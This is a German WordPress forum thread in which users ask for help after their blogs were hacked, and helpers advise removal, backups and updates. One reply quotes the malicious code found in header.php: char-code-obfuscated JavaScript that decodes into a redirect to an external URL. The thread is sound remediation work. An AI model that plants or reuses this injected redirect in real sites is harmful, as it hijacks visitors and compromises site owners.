Zurück   WordPress Deutschland Forum > Support > Allgemeines

Antwort
 
Themen-Optionen Ansicht
Alt 17.07.2008, 23:37   #1 (permalink)
PostRank: 0
 
Registriert seit: 17.07.2008
Beiträge: 7
Wordpress gehackt und Umleitung eingebaut

Offensichtlich hat heute irgendjemand meinen Blog gehackt und dort eine Umleitung eingebaut. Ich gehe davon aus, dass da irgendwas an der SQL-DB veranstaltet wurde. Ich hoffe, ihr könnt mir helfen, das wieder zu ändern.

RandyFisher’s Blog
RandyFisher ist offline   Mit Zitat antworten
Alt 17.07.2008, 23:43   #2 (permalink)
WPD-Team
 
Benutzerbild von codestyling
 
Registriert seit: 30.03.2008
Ort: Leipzig
Beiträge: 999
Schau in deine header.php und wirf das raus, ist eine Javascript Weiterleitung:
Code:
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
Teste danach ob der Blog wieder geht und dann sag Bescheid, dann sehen wir weiter.

PS: Avira meint bei ausgeschaltetem Javascript im Fox -> HTML/crypted.gen gefunden.
__________________
It's not a bug, it's always a feature. | Code Styling

Geändert von codestyling (17.07.2008 um 23:53 Uhr).
codestyling ist offline   Mit Zitat antworten
Alt 17.07.2008, 23:49   #3 (permalink)
PostRank: 0
 
Registriert seit: 17.07.2008
Beiträge: 7
Hab den JavaScript rausgeworfen. Blog geht wieder. Erstaunlicherweise hatte Antivir sogar den "Scriptvirus" gemeldet, aber das soll mal nebensächlich sein.

Am besten mach ich gleich mal ein WP-Update. Sonst noch irgendwas, das ich tun sollte?
Kategorien und Links sind übrigens verschwunden.

Und vielen Dank, wäre von selbst nicht darauf gekommen, wo das versteckt ist.

Geändert von RandyFisher (17.07.2008 um 23:52 Uhr).
RandyFisher ist offline   Mit Zitat antworten
Alt 17.07.2008, 23:52   #4 (permalink)
WPD-Team
 
Benutzerbild von codestyling
 
Registriert seit: 30.03.2008
Ort: Leipzig
Beiträge: 999
Ja, trotzdem vorher ein Backup der Datenbank machen und dann erst updaten. Nur für den Fall, das noch irgendwas nach dem Update nicht will und zerspielt wurde.
__________________
It's not a bug, it's always a feature. | Code Styling
codestyling ist offline   Mit Zitat antworten
Alt 17.07.2008, 23:55   #5 (permalink)
PostRank: 0
 
Registriert seit: 17.07.2008
Beiträge: 7
Bereits geschehen. Das war eh das erste, was ich machte, bevor ich anfing, an irgendwas rumzuspielen.

Kurze Frage noch: Wie konnte das passieren, dass jemand einen JavaScript dort hineinschreibt? Ich würde nämlich gern verhindern, dass das nochmal passiert.

Geändert von RandyFisher (17.07.2008 um 23:59 Uhr).
RandyFisher ist offline   Mit Zitat antworten
Alt 18.07.2008, 03:04   #6 (permalink)
PostRank: 4
 
Benutzerbild von LastOne
 
Registriert seit: 17.10.2005
Beiträge: 152
Welche Wordpress Version hast du denn bisher genutzt?

Gibt verschiedene Möglichkeiten:
Wie sicher ist dein Passwort?
Welche WP Version?
Wer ist dein Hoster? Ev. sind sie darüber eingedrungen...
Welche Plugins?
LastOne ist offline   Mit Zitat antworten
Alt 23.07.2008, 17:49   #7 (permalink)
PostRank: 0
 
Registriert seit: 23.07.2008
Beiträge: 5
Ebenfalls gehackt

Hallo zusammen,

leider ist mein Blog ebenfalls gehackt worden. Anders als Randy bin ich aber Technik-Legasthenikerin und brauche fachkundige Hilfe, um das Ganze zu beheben . Das Blog ist vom Netz, aber wie ich jetzt ein Backup mache und meine Daten wieder säubere, überfordert mich leider. Meine vorsichtige Suche nach der header.php (über Cyberduck und TextWrangler) hat mich leider nicht zum gewünschten Punkt geführt, und ich würde mich sowieso nicht trauen, einfach so was zu löschen.

Also, wer Ahnung hat, sende mir bitte eine PM mit Honorarvorstellungen. Ich hätte mein Blog schon gerne bald wieder in alter Schönheit am Netz .

Danke und viele Grüße
Heide
heide ist offline   Mit Zitat antworten
Alt 23.07.2008, 20:04   #8 (permalink)
PostRank: 4
 
Registriert seit: 29.04.2007
Beiträge: 214
geht auch ohne Kohle, wenn du mal den Link postest + das Teil vielleicht unter einer anderen URL wieder online stellst
Herr Schmidt ist offline   Mit Zitat antworten
Alt 23.07.2008, 20:15   #9 (permalink)
PostRank: 0
 
Registriert seit: 23.07.2008
Beiträge: 5
Siehst Du, da geht's schon los. Die URL lautet www.heide-liebmann.de/blog, aber das lässt sich ja nicht aufrufen. Und wie ich das unter einer anderen URL machen soll - keine Ahnung. Vom Netz genommen hat das heute morgen der Mensch, bei dem das Ganze auf dem Server liegt.

Tut mir leid, ich bin da wirklich überfordert.
heide ist offline   Mit Zitat antworten
Alt 24.07.2008, 00:35   #10 (permalink)
PostRank: 4
 
Benutzerbild von LastOne
 
Registriert seit: 17.10.2005
Beiträge: 152
Na ja, bei wem lässt du den hosten? und wie hast du es eingerichtet?
LastOne ist offline   Mit Zitat antworten
Antwort

Lesezeichen

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist aus.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus


Alle Zeitangaben in WEZ +1. Es ist jetzt 08:23 Uhr.


Powered by vBulletin® Version 3.7.4 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0 | Impressum | Ein Inpsyde.com Projekt